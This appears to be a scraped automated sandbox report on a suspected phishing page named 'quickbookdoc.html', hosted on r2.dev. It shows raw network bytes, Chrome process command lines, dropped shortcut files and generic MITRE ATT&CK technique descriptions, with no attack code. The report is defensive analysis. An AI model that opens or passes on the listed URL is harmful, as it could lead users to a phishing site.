2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 Data Ascii: DDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 Data Ascii:
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 Data Ascii: """""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 Data Ascii: UDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUU

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 5880, Parent PID: 5704

General

Target ID:	0
Start time:	01:37:31
Start date:	17/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6352, Parent PID: 5880

General

Target ID:	2
Start time:	01:37:33
Start date:	17/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2024,i,11750120079894253416,16805312831914137619,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 2824, Parent PID: 5704

General

Target ID:	3
Start time:	01:37:36
Start date:	17/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html